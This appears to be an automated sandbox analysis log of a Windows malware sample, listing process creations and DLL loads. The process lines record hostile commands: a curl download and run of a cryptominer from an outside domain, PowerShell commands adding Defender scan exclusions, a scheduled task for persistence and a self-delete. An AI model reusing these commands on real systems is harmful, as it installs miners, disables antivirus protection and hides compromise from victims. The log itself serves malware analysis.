Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Source: C:\Windows\System32\services64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
